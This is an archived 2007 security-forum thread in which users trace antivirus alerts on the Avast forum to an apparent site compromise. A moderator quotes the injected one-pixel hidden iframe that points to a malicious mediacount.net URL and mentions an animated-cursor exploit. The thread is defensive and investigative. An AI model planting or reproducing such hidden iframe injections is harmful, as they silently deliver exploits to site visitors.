Get this folks...

Discussion in 'malware problems & news' started by JeremyWW, Aug 24, 2007.

Thread Status:
Not open for further replies.
  1. JeremyWW
    Offline

    JeremyWW Registered Member

    Alwil's credibility just hit the ground floor like an elevator with the wires cut...

    Go here and see what NOD32 does: h__p://forum.avast.com/
    Last edited by a moderator: Aug 24, 2007
  2. The_Duality
    Offline

    The_Duality Registered Member

    Hmm... surprising, yet common sense says FP.
    Last edited by a moderator: Aug 24, 2007
  3. JeremyWW
    Offline

    JeremyWW Registered Member

    Possibly, BUT...Avast! itself picks it up...so their own signatures are picking it up on their own site!
    Last edited: Aug 24, 2007
  4. flyrfan111
    Offline

    flyrfan111 Registered Member

    F-Prot flags it also. Starting to sound like a legit detection. It isn't on Avast's site though, you are getting redirected to Media Count. It only works in IE. FF and Opera don't get it, at least on my system.
  5. JeremyWW
    Offline

    JeremyWW Registered Member

    Exactly, which is why I just uninstalled Avast!, wrote a fairly abrupt e-mail to their research team and came back here looking for sanity! I think I found it in the form of NOD32 AV Beta. I've been a long term NOD32 user and I've been waiting for this...at last...!!! :)
  6. flyrfan111
    Offline

    flyrfan111 Registered Member

    Run an On Demand Scan and then look at your log.
  7. The_Duality
    Offline

    The_Duality Registered Member

    Oooer o_O

    This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy.
  8. JeremyWW
    Offline

    JeremyWW Registered Member

    Doing it now...
  9. flyrfan111
    Offline

    flyrfan111 Registered Member

    I only get it in IE, not in FF, perhaps that ad blocking plug in stops it.
  10. JeremyWW
    Offline

    JeremyWW Registered Member

    In depth scan finished: Clean machine...
  11. flyrfan111
    Offline

    flyrfan111 Registered Member


    Look at the log, do you have a bunch of "internal errors"?
  12. raven211
    Offline

    raven211 Registered Member

    Haven't made a scan yet - might do it later, just to see if NOD32 picks something up in general. I got the warning/infection message in Opera though.
  13. The_Duality
    Offline

    The_Duality Registered Member

    I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here.
  14. JeremyWW
    Offline

    JeremyWW Registered Member

    No. I'm looking for that specific string, yes? Nothing...

    OK...just one, but nothing to do with anything...

    24/08/2007 23:03:56 D:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe » ZIP » office2003-KB912022-GLB.exe - internal error
  15. LoneWolf
    Online

    LoneWolf Registered Member

    Noticed this earlyer.
    Thought LSP was giving me a FP.
    Maybe not.
    Site may have been hacked o_O
    I know this has happened to other sites forum and not in the past.
    Anyone else can confirm this?

    Attached Files:

  16. flyrfan111
    Offline

    flyrfan111 Registered Member

    Correct, 2.7 works like a charm.
  17. JeremyWW
    Offline

    JeremyWW Registered Member

    Yup...

    Attached Files:

  18. flyrfan111
    Offline

    flyrfan111 Registered Member

    I have thousands of them. 228 pages in a word document!!
  19. The_Duality
    Offline

    The_Duality Registered Member

    Hacking is looking quite likely here :doubt:
  20. flyrfan111
    Offline

    flyrfan111 Registered Member

    Yup. Sure looks that way(More Likely). Or quite a few different AV's and Link Scanner are giving FPs(Less Likely).
  21. Bubba
    Offline

    Bubba Updates Team

    We'll alter the clickable links for the time being until it's determined what....IF anything is going on. We'll also caution any that wish to still visit the link.

    <iframe src='h__p://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>

    Thanks
    Bubba
    Nod32.gif
  22. The_Duality
    Offline

    The_Duality Registered Member

    I guess it is possible that it could be an FP. it is an ad/media link being flagged, so it may be the way that the Ad/link is implemented that appears malicious. Could happen. *shrugs*
  23. raven211
    Offline

    raven211 Registered Member

    Hehe.. Just a bit funny though that many others detect it also then. :rolleyes:
  24. The_Duality
    Offline

    The_Duality Registered Member

    Thats what I mean. It may be a suspicious implementation of something that is triggering the AV response. Of course, it may most likely be a real threat. Havent seen one in months

    Quite exciting to get a real alert for once...
    Last edited by a moderator: Aug 24, 2007
  25. Bubba
    Offline

    Bubba Updates Team

    It is a real threat at the moment due to the iframe code and link still available at Avast.

    Windows Animated Cursor Stack Overflow Vulnerability

    portion of the ani code from the mediacount.net/strong/020sdsfg/324123.htm link

    We have also moved this to a more appropriate forum so others that visit the Avast Forums can be made aware.

    Procede with caution,
    Bubba
Thread Status:
Not open for further replies.